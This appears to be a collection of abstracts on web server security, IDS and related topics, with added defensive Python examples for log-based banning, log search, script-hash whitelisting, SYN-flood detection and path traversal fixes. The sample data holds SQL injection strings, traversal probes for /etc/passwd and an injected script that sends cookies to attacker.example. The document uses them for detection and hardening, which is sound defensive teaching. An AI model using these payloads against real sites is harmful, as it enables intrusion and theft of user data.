Securing Web Application by Embedded Firewall at Gytech Indosantara Mandiri Ltd.

2020 ◽  
Vol 8 (1) ◽  
pp. 49-58
Author(s):  
Muhammad Yusup ◽  
Maisyaroh Maisyaroh ◽  
Laila Septiana

Gytech Indosantara Mandiri Ltd. has suffered many cybercrime attacks on its web server in the last few years, causing both moral and material losses, so ways to fight and prevent attacks on the web server had to be considered. One way is the attack-signature approach, using ModSecurity and fail2ban together as a Web Application Firewall (WAF). ModSecurity is used to detect and block attacks on the HTTP and HTTPS services, whereas fail2ban is used to stop brute-force attacks on the SSH, FTP and Telnet services. ModSecurity, acting as the WAF, writes a log entry when an exploit attempt against the web server is detected; fail2ban reads that log and blocks the attacker's IP address, so the pair serves as a WAF and as layer-7 network security.
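The log-to-ban chain described in the abstract, as an added example that is not code from the paper and not fail2ban itself: a Python re-implementation of the filter, maxretry and findtime logic that fail2ban applies to ModSecurity denial lines (fail2ban ships a filter named apache-modsecurity for exactly these `[client <ip>]` lines). The log lines, IP addresses, rule ids and the threshold values are constructed; the iptables command is the illustrative form of what a ban action runs, not fail2ban's exact chain names.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed lines in the shape ModSecurity v2 writes to the Apache error log
# when it denies a request; IP addresses are from documentation ranges.
SAMPLE_LOG = """\
[Tue Jun 09 10:00:01.000000 2020] [:error] [pid 4242] [client 203.0.113.7:51234] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "union select" [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [uri "/search"]
[Tue Jun 09 10:00:03.000000 2020] [:error] [pid 4242] [client 203.0.113.7:51240] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "<script" [id "941100"] [msg "XSS Attack Detected via libinjection"] [uri "/comment"]
[Tue Jun 09 10:00:04.000000 2020] [:error] [pid 4243] [client 198.51.100.9:40001] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "../" [id "930100"] [msg "Path Traversal Attack (/../)"] [uri "/download"]
[Tue Jun 09 10:00:05.000000 2020] [:error] [pid 4242] [client 203.0.113.7:51242] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "or 1=1" [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [uri "/login"]
[Tue Jun 09 10:30:00.000000 2020] [:error] [pid 4243] [client 198.51.100.9:40010] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "../" [id "930100"] [msg "Path Traversal Attack (/../)"] [uri "/download"]
[Tue Jun 09 10:30:01.000000 2020] [:error] [pid 4243] [client 198.51.100.9:40011] ModSecurity: Warning. Pattern match [id "920350"] [msg "Host header is a numeric IP address"] [uri "/"]
"""

# Timestamp, client address and the literal "Access denied" marker. Warnings
# (rules that only log) do not match, so they never count toward a ban.
LINE_RE = re.compile(
    r"^\[[A-Z][a-z]{2} (?P<mon>[A-Z][a-z]{2}) (?P<day>\d{2}) (?P<hms>\d{2}:\d{2}:\d{2})\.\d+ (?P<year>\d{4})\]"
    r".*?\[client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\] ModSecurity: Access denied"
)
MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}


def parse_denial(line):
    """Return (timestamp, client_ip) for a ModSecurity denial line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.group("hms").split(":"))
    when = datetime(int(m.group("year")), MONTHS[m.group("mon")], int(m.group("day")), h, mi, s)
    return when, m.group("ip")


def fail2ban_like(log_text, maxretry=3, findtime=600):
    """Return {ip: ban_time}; an IP is banned once it has maxretry denials
    within a sliding window of findtime seconds (fail2ban's two jail knobs)."""
    recent = defaultdict(deque)
    banned = {}
    for line in log_text.splitlines():
        parsed = parse_denial(line)
        if parsed is None:
            continue
        when, ip = parsed
        if ip in banned:
            continue
        window = recent[ip]
        window.append(when)
        while (when - window[0]).total_seconds() > findtime:
            window.popleft()  # drop denials older than findtime
        if len(window) >= maxretry:
            banned[ip] = when
    return banned


def iptables_rules(banned):
    """Illustrative equivalent of the firewall action fail2ban runs on ban."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in banned]


if __name__ == "__main__":
    bans = fail2ban_like(SAMPLE_LOG)
    for ip, when in bans.items():
        print(f"{when:%H:%M:%S} ban {ip}")
    print("\n".join(iptables_rules(bans)))
```

In the constructed log, 203.0.113.7 is banned on its third denial at 10:00:05, while 198.51.100.9 is not: its two denials are 30 minutes apart, so they never share a 600-second window, and its final warning line does not count. Two caveats for deployment: a ban keyed on source IP is sidestepped by an attacker who rotates addresses and can lock out every user behind one NAT, and the monitoring and scanning hosts belong in fail2ban's `ignoreip` list so the WAF's own test traffic does not ban them.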

2016 ◽  
Vol 1 (1) ◽  
pp. 001
Author(s):  
Harry Setya Hadi

String searching is a common operation in computing because text is the main form in which data is stored. Boyer-Moore, which compares the pattern from right to left, is considered the most efficient method in practice, and it is the algorithm with the best theoretical results for matching a string in a given direction. A machine connected to a network, typically a web server, is accessed by many users, some with good and some with bad intentions. Every activity a user performs is stored in the web server logs, and the log reports on a web server help a web server administrator search for erroneous web requests. A web server log is a record of a web site's activity that contains the client IP address, the time of access, the page opened, the activity and the access method. The amount of data contained in the resulting logs makes them a rich source of useful information.
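An added example of the search the abstract describes, not code from the paper: a Boyer-Moore-Horspool matcher (the bad-character rule alone, the simplification of Boyer-Moore most often used in practice) applied to a handful of constructed combined-format web server log lines. The IP addresses, paths and user agents are made up. It also handles the detail a log search has to get right: the request field is URL-encoded, so the line is percent-decoded before matching, otherwise a probe written as `%2e%2e%2f` is never found by a search for `../`.

```python
from urllib.parse import unquote


def bmh_search(text, pattern):
    """Index of the first occurrence of pattern in text, or -1 if absent.

    Boyer-Moore-Horspool: the window is compared from right to left and, on a
    mismatch, shifted by the bad-character distance of the character under the
    window's last position (the full pattern length when that character does
    not occur in the pattern).
    """
    m, n = len(pattern), len(text)
    if m == 0:
        return 0
    if m > n:
        return -1
    # Shift table built from every pattern position except the last one.
    shift = {}
    for i in range(m - 1):
        shift[pattern[i]] = m - 1 - i
    i = 0
    while i <= n - m:
        j = m - 1
        while j >= 0 and text[i + j] == pattern[j]:
            j -= 1
        if j < 0:
            return i
        i += shift.get(text[i + m - 1], m)
    return -1


# Constructed combined-format log lines; addresses are from documentation ranges.
SAMPLE_LINES = [
    '203.0.113.7 - - [09/Jun/2020:10:00:01 +0700] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Jun/2020:10:00:02 +0700] "GET /index.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "sqlmap/1.4"',
    '198.51.100.9 - - [09/Jun/2020:10:00:03 +0700] "GET /download?file=../../etc/passwd HTTP/1.1" 404 162 "-" "curl/7.68.0"',
    '192.0.2.44 - - [09/Jun/2020:10:00:04 +0700] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Jun/2020:10:00:05 +0700] "GET /download?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 162 "-" "curl/7.68.0"',
]


def grep_log(lines, pattern, decode=True):
    """Return (client_ip, original_line) for every line containing pattern.

    With decode=True the line is percent-decoded before matching, so encoded
    and plain forms of the same probe are both found.
    """
    hits = []
    for line in lines:
        haystack = unquote(line) if decode else line
        if bmh_search(haystack, pattern) != -1:
            hits.append((line.split(" ", 1)[0], line))
    return hits


if __name__ == "__main__":
    for ip, line in grep_log(SAMPLE_LINES, "../"):
        print(ip, "->", line.split('"')[1])
```

Searching the sample for `../` returns both traversal probes from 198.51.100.9; with decoding switched off only the plain one is found, which is the gap an attacker relies on. Plain substring search is only as good as the normalisation in front of it, so the decoding step belongs in any log search used for detection.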


2018 ◽  
Vol 7 (3.6) ◽  
pp. 106
Author(s):  
B J. Santhosh Kumar ◽  
Kankanala Pujitha

The application uses the URL as the input for web application vulnerability detection. If the URL is very long, scanning it takes more time (Ain Zubaidah et al. 2014), and the existing system can examine individual web pages but not the web application as a whole. This application tests URLs of any length using a string-matching algorithm. To prevent XSS and CSRF, and to detect attacks that try to sidestep browser-enforced policies, it uses a whitelist and DOM sandboxing (Elias Athanasopoulos et al. 2012). The web application holds a list of cryptographic hashes of legitimate (trusted) client-side scripts; a script is considered trusted only if its hash is found in the whitelist, otherwise it is untrusted. The application uses SHA-1 to compute the message digest. The web server places trusted scripts inside div or span HTML elements that carry a trusted attribute. DOM sandboxing helps identify script or code by partitioning program symbols into code and non-code, which exposes any hidden code inside a trusted tag that would otherwise bypass the web server. The web site is scanned to detect injection points, malicious XSS attack vectors are injected at those points, and the vulnerable web application is checked for these attacks (Shashank Gupta et al. 2015). The proposed application improves the false negative rate.
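The hash whitelist described above, as an added example (not the authors' code): every inline script in a page is extracted, its digest is computed, and the script is accepted only if the digest is in the whitelist, so an injected script is flagged regardless of where in the DOM it landed. The page, the trusted scripts and the injected payload are constructed. The abstract uses SHA-1; since SHA-1 collisions are practical (SHAttered, 2017), the digest algorithm is a parameter here and SHA-256 is the sensible default in new deployments. This is also the mechanism that Content Security Policy standardises as hash sources (`script-src 'sha256-...'`), where the browser rather than the server does the check.

```python
import hashlib
from html.parser import HTMLParser


class InlineScriptCollector(HTMLParser):
    """Collect the full text content of every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies may arrive in several chunks; concatenate them.
        if self._in_script:
            self.scripts[-1] += data


def script_digest(source, algo="sha1"):
    """Hex digest of a script's exact source text (SHA-1 as in the paper;
    pass algo="sha256" for a collision-resistant choice)."""
    return hashlib.new(algo, source.encode("utf-8")).hexdigest()


def check_page(html, whitelist, algo="sha1"):
    """Split the page's inline scripts into (trusted, untrusted) by digest.

    Matching is exact: a single changed byte in a trusted script, including
    whitespace, moves it to the untrusted list. That is the property that makes
    injected code detectable, and also why template-interpolated scripts cannot
    be whitelisted this way.
    """
    parser = InlineScriptCollector()
    parser.feed(html)
    parser.close()
    trusted, untrusted = [], []
    for src in parser.scripts:
        (trusted if script_digest(src, algo) in whitelist else untrusted).append(src)
    return trusted, untrusted


# Constructed trusted scripts and the whitelist the server would hold for them.
TRUSTED_SCRIPTS = [
    "document.getElementById('total').textContent = cart.total;",
    "window.addEventListener('load', function () { init(); });",
]
WHITELIST = {script_digest(s) for s in TRUSTED_SCRIPTS}

# Constructed page: two trusted inline scripts plus one injected through an
# unescaped comment field. attacker.example is a reserved, non-routable name.
PAGE = (
    "<html><body>"
    "<div trusted><script>" + TRUSTED_SCRIPTS[0] + "</script></div>"
    "<p>Comment: nice site <script>fetch('https://attacker.example/c?'+document.cookie)</script></p>"
    "<span trusted><script>" + TRUSTED_SCRIPTS[1] + "</script></span>"
    "</body></html>"
)

if __name__ == "__main__":
    ok, bad = check_page(PAGE, WHITELIST)
    print(f"{len(ok)} trusted, {len(bad)} untrusted")
    for src in bad:
        print("REJECT:", src)
```

Hashing only covers `<script>` bodies. Inline event handlers (`onclick=...`), `javascript:` URLs and external scripts need the separate attribute partitioning the abstract calls DOM sandboxing, or an allow-list of script sources, to be covered as well.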


Organizational web servers reflect the public image of an organization and serve web pages and information to organizational clients via web browsers using the HTTP protocol. Some web server software hosts web applications that let users perform high-level tasks, such as querying a database and delivering the output through the web server to the client browser as an HTML file. Attackers constantly try to exploit the vulnerabilities or flaws in web servers and web applications, which poses a big threat to an organization. This chapter explains the importance of protecting web servers and applications, along with the different tools used for analyzing their security. It also introduces the different web attacks an attacker carries out either to gain illegal access to web server data or to reduce the availability of web services. The web server attacks include denial of service (DoS) attacks, buffer overflow exploits, website defacement with SQL injection (SQLi) attacks, cross-site scripting (XSS) attacks, remote file inclusion (RFI) attacks, directory traversal attacks, phishing attacks, brute force attacks, source code disclosure attacks, session hijacking, parameter and form tampering, man-in-the-middle (MITM) attacks, HTTP response splitting attacks, cross-site request forgery (XSRF), lightweight directory access protocol (LDAP) attacks, and hidden field manipulation attacks. The chapter describes web server and web application testing tools and vulnerability scanners including Nikto, Burp Suite, Paros, IBM AppScan, Fortify, Acunetix, and ZAP. Finally, the chapter discusses the countermeasures to implement when designing any web application for an organization in order to reduce the risk.


Respati ◽  
2020 ◽  
Vol 15 (2) ◽  
pp. 6
Author(s):  
Lukman Lukman ◽  
Melati Suci

Abstract: Network security on the web server is the most important part of guaranteeing integrity and service for users. Web servers are often the target of attacks that result in data damage. One of them is the SYN flood, a type of Denial of Service (DoS) attack that sends a massive number of SYN requests to the web server. To strengthen web server network security, an Intrusion Detection System (IDS) is deployed to detect, monitor and analyse attacks on the web server. Frequently used IDS software includes Snort and Suricata, each with its own advantages and disadvantages. The purpose of this study is to compare the two IDSs on the Linux operating system by attacking the web server with a SYN flood; Snort and Suricata, installed on the web server, should raise an alert when the attack occurs. The comparison uses two reference parameters: the number of attacks detected and the effectiveness of attack detection of each IDS.
Keywords: Network Security, Web Server, IDS, SYN Flood, Snort, Suricata.
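The detection both IDSs perform for this attack, as an added example that is not code from the study and not Snort or Suricata themselves: a sliding-window count of bare SYNs (SYN set, ACK clear), which is what a rule with a `detection_filter` threshold does in both engines. The packet records are constructed, with one normal handshake, one flood from a single host and one flood from spoofed sources; the thresholds are illustrative. The example tracks per destination port as well as per source, because a flood using random spoofed sources never trips a per-source count.

```python
from collections import defaultdict, deque

# Equivalent rule in Snort/Suricata syntax, for comparison with the code below
# (flags:S,12 = SYN set, reserved bits ignored; port and sid are illustrative):
#   alert tcp any any -> $HOME_NET 80 (msg:"Possible SYN flood";
#       flags:S,12; detection_filter:track by_dst, count 20, seconds 1;
#       sid:1000001; rev:1;)

# Constructed packet records: (time in seconds, source IP, destination port, TCP flags).
# A legitimate client completes its handshake, so only its first packet is a bare SYN.
SAMPLE_PACKETS = [
    (0.00, "192.0.2.44", 80, "S"),
    (0.01, "192.0.2.44", 80, "A"),
    (0.02, "192.0.2.44", 80, "PA"),
    (0.50, "192.0.2.45", 443, "S"),
    (0.51, "192.0.2.45", 443, "A"),
]
# Flood 1: a single host sends 25 bare SYNs to port 80 within half a second.
SAMPLE_PACKETS += [(1.0 + 0.02 * i, "203.0.113.7", 80, "S") for i in range(25)]
# Flood 2: 30 bare SYNs from 30 different (spoofed) sources within one second.
SAMPLE_PACKETS += [(3.0 + 0.03 * i, f"198.51.100.{i + 1}", 80, "S") for i in range(30)]


def is_bare_syn(flags):
    """SYN set and ACK clear: a connection attempt, not a SYN-ACK reply."""
    return "S" in flags and "A" not in flags


def detect_syn_flood(packets, count=20, seconds=1.0):
    """Sliding-window threshold over bare SYNs, tracked per source IP and per
    destination port. Returns [(time, ("src", ip) or ("dport", port), count)],
    one alert each time a tracked key reaches `count` SYNs within `seconds`."""
    windows = {"src": defaultdict(deque), "dport": defaultdict(deque)}
    alerts = []
    for t, src, dport, flags in sorted(packets, key=lambda p: p[0]):
        if not is_bare_syn(flags):
            continue
        for track, key in (("src", src), ("dport", dport)):
            q = windows[track][key]
            q.append(t)
            while t - q[0] > seconds:
                q.popleft()  # expire SYNs older than the window
            if len(q) == count:
                alerts.append((t, (track, key), count))
    return alerts


if __name__ == "__main__":
    for t, key, n in detect_syn_flood(SAMPLE_PACKETS):
        print(f"t={t:.2f}s  {key[0]}={key[1]}  {n} SYNs within 1s")
```

On the sample, the single-host flood fires both the per-source and the per-port alert at the twentieth SYN, while the spoofed flood fires only the per-port alert; per-source tracking alone would have missed it. An IDS only reports the flood. On the web server itself the mitigation is SYN cookies (`net.ipv4.tcp_syncookies` on Linux) or a rate limit in front of the listener.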


2014 ◽  
Vol 29 (2) ◽  
pp. 134-153
Author(s):  
Andrés Fortier ◽  
Cecilia Challiol ◽  
Juan Lautaro Fernández ◽  
Santiago Robles ◽  
Gustavo Rossi ◽  
...  

Abstract: There is an increasing trend in moving desktop applications to web browsers, even when the web server is running on the same desktop machine. In this paper, we go further in this direction and show how to combine a web server, a web application framework (enhanced to support desktop-like Model–View–Controller interaction) and a context-aware architecture to develop web-based mobile context-aware applications. By using this approach we take advantage of the well-established web paradigm to design the graphical user interfaces (GUIs) and the inherent ability of the web to mash up applications with external components (such as Google Maps). On top of that, since the web server runs on the device itself, the application can access local resources (such as disk space or sensing devices, which are indispensable for context-aware systems) avoiding the sandbox model of the web browsers. To illustrate our approach we show how a mobile hypermedia system has been built on top of our platform.


Author(s):  
Milena Vesić ◽  
Nenad Kojić

Web applications are the most common type of application in modern society, since they can be accessed by a large number of users at any time from any device; the only condition for their use is an Internet connection. Most applications run over the HTTP protocol in a client-server architecture. This architecture is based on the use of an API (Application Programming Interface), most often in the REST (Representational State Transfer) style. If there are several different functionalities on a web page that fill their content with data from the web server, most of them need a separate HTTP request using one of the existing methods (GET, POST, PUT, DELETE). This form of communication becomes a big problem when the Internet connection is weak and there are many HTTP requests, because each request has to be executed and its data returned by the web server. In this paper, one implementation of GraphQL is presented. GraphQL is an open-source data query and manipulation language for APIs. GraphQL enables faster application development and requires less server code. Its key advantage is the number of HTTP requests, because all the data a page needs is obtained with a single request. This paper presents a comparative analysis, on the example of a real website, of the REST architecture and GraphQL under different qualities of Internet connection, in code complexity and in the number of required requests.


Author(s):  
Mrunalsinh Chawda ◽  
Dr. Priyanka Sharma ◽  
Mr. Jatin Patel

In modern web applications, a directory traversal vulnerability can allow an attacker to view arbitrary files, including sensitive ones, and identified vulnerabilities or misconfigurations can be chained to obtain root privileges. When building a web application, make sure that arbitrary files are not publicly reachable through the production server. A local file inclusion happens when uncontrolled user input, such as form values or headers, is used to construct a file include path in the dynamic file-include mechanism of a programming framework. By exploiting directory traversal in a web server an attacker can read files at will, and by chaining it with code injection they can upload a shell to the web server and carry out a website defacement attack. The related remote file inclusion attack takes advantage of a vulnerable web site parameter by supplying a URL that references remotely hosted malicious code, allowing remote code execution that leads to privilege escalation.
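The flaw and its fix side by side, as an added example that is not the authors' code: a download handler that pastes user input into a path under a document root, beside a version that canonicalises the result and refuses anything that resolves outside the root. The document root, file names and request parameters are constructed. The hardened version also covers the cases that simple fixes miss: an absolute path (which `os.path.join` accepts as a replacement for the root), a percent-encoded `..%2f`, an embedded NUL byte, and a symlink inside the root that points outside it.

```python
import os
import tempfile
from urllib.parse import unquote

DOCROOT = "/var/www/app/files"  # assumed document root of the download handler


def resolve_vulnerable(docroot, user_path):
    """The flaw the abstract describes: user input is joined onto the root.
    normpath collapses "..", so "../../../../etc/passwd" resolves to /etc/passwd."""
    return os.path.normpath(os.path.join(docroot, user_path))


def resolve_safe(docroot, user_path):
    """Canonicalise, then require the result to remain inside docroot.

    realpath follows symlinks and collapses "..", so the containment check is
    made on what the filesystem would actually open. commonpath, rather than a
    str.startswith prefix test, stops "/var/www/app/files_private" from passing
    as a child of "/var/www/app/files". Returns None for anything rejected.
    """
    if "\x00" in user_path:  # a NUL truncates the path in C-based file APIs
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def handle_download(docroot, raw_param):
    """Decode the query parameter the way the framework would, then resolve it
    safely. Returns (http_status, path_or_None)."""
    path = resolve_safe(docroot, unquote(raw_param))
    return (403, None) if path is None else (200, path)


def symlink_escape_blocked():
    """Build a real temporary docroot containing a symlink to a file outside it,
    and show that normpath-based checking passes it while realpath rejects it."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "files")
        os.mkdir(docroot)
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("outside the document root")
        os.symlink(secret, os.path.join(docroot, "link"))
        naive_passes = resolve_vulnerable(docroot, "link").startswith(docroot)
        return naive_passes and resolve_safe(docroot, "link") is None


if __name__ == "__main__":
    for param in ["reports/q1.pdf", "../../../../etc/passwd", "/etc/passwd", "..%2f..%2f..%2f..%2fetc%2fpasswd"]:
        print(f"{param!r:45} vulnerable={resolve_vulnerable(DOCROOT, unquote(param))!r:35} safe={handle_download(DOCROOT, param)}")
    print("symlink escape blocked:", symlink_escape_blocked())
```

The containment check belongs after every decoding step the server performs, because a check run on the still-encoded parameter is bypassed by the encoded form. Serving files by an opaque identifier looked up in a table, rather than by a client-supplied path, removes the traversal surface altogether.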


2015 ◽  
Vol 3 (2) ◽  
pp. 171
Author(s):  
Dyakso Anindito Nugroho ◽  
Adian Fatchur Rochim ◽  
Eko Didik Widianto

The use of information technology gives its users the advantage of open access, but a new problem arises: the threat from unauthorized users. An Intrusion Detection System (IDS) is deployed to help the administrator monitor network security, but an IDS displays illegal-access information in a raw form that takes a long time to read. This final project designs an IDS web application that pulls information from the IDS sensor database, processes it and presents it in tables and graphs that are easy to understand. The web application also has an iptables firewall module to block an attacker's IP address. The hardware used is a Cisco IPS 4240, two Compaq Presario 4010F computers as client and gateway, and a Cisco Catalyst 2960 switch. The software used is the Ubuntu 12.04 LTS (Precise Pangolin) operating system, the BackTrack 5 R1 operating system, the PHP 5.4 programming language, the MySQL 5 database, and the web-based system configuration tool Webmin. Testing is done with several BackTrack applications to confirm that the Cisco IPS 4240 detects in accordance with the applicable rules. Each event of an attack attempt or threat is obtained from the IDS sensor database in XML form; the XML is transferred using the Security Device Event Exchange (SDEE) protocol. The web application is tested by checking that its output tables and graphs display the sensor's detection results correctly. This study produced an intrusion detection system that is easier to monitor: network packets are copied by the Cisco 2960 switch and forwarded to the sensor, intruder detection is done by the Cisco IPS 4240 sensor, and the detection logs are processed by the web application into tables and graphs. Intrusion detection systems are intended to improve network security.


Author(s):  
Jana Polgar ◽  
Robert Mark Braum ◽  
Tony Polgar

Servlets are server-side programs that respond to requests from browsers. They run in the web environment. Portal technology grew out of servlets, and each portal page ends up as a servlet. Servlet technology is the foundation of web application development in the Java programming language; therefore, understanding servlet technology and the web server architecture is important.


Author(s):  
Abid Hussain ◽  
Praveen Kumar Sharma

In the client-server architecture, any web or desktop application can be deployed using the 3-tier application architecture, which consists of a presentation layer, an application layer and a data layer. All three layers play a vital role in performing a variety of operations, including business logic, data storage and request handling. In this paper, we present the deployment process for a web application in a local area network where the database and the application reside on a remote or web server. Other clients only access the application via a specific IP address and valid credentials. Every request is transmitted through the client application and sent to the web server, and the web server returns the resulting data to the requesting client via the web application. We identified several loopholes from the 3-tier architecture adoption perspective and highlighted a web application deployment interoperability issue that deserves substantial further research and development. In this paper, we investigate several tools and techniques, including the web server, database server and front-end tools, for the successful deployment of a web application in the LAN-based 3-tier architecture.

